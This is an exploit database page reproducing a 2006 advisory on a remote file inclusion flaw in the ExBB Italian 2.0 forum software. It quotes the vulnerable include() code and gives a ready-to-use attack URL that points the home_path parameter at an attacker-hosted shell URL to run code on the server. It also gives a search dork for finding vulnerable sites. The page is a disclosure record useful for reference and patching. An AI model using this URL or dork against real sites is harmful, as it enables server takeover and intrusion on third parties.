header-logo
Suggest Exploit
vendor:
ExBB Italian
by:
SHiKaA
N/A
CVSS
N/A
Remote File Inclusion
98
CWE
Product Name: ExBB Italian
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: YES
Related CWE: N/A
CPE: a:exbb:exbb_italian
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

ExBB Italian version <= v2.0 (home_path) Remote File Inclusion Exploit

A vulnerability exists in ExBB Italian version <= v2.0, which allows a remote attacker to include a file from a remote host. The vulnerability is due to the 'home_path' parameter in the 'modules/userstop/userstop.php' script not properly sanitizing user-supplied input. An attacker can exploit this vulnerability to include arbitrary files from remote hosts, which can lead to the execution of arbitrary code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of ExBB Italian.
Source

Exploit-DB raw data:

#==============================================================================================
#ExBB Italian version <= v2.0 (home_path) Remote File Inclusion Exploit
#===============================================================================================
#                                                                          
#Critical Level : Dangerous                                                
#                                                                          
#Venedor site : http://www.exbb.altervista.org/           
#                                                                           
#Version : 2.0                                                
#                                                             
#================================================================================================
#Bug in : smodules/userstop/userstop.php
#
#Vlu Code :
#--------------------------------
#     <?
#  include($exbb['home_path'].'modules/userstop/data/userstop_conf.php');
#  include($exbb['home_path'].'modules/userstop/language/'.$exbb['default_lang'].'/lang.php')
#    
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/modules/userstop/userstop.php?exbb[home_path]=http://SHELLURL.COM?
#
#DOrk : in Yahoo.it =====>         "Powered by ExBB "
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior
==================================================================================================

# milw0rm.com [2006-08-29]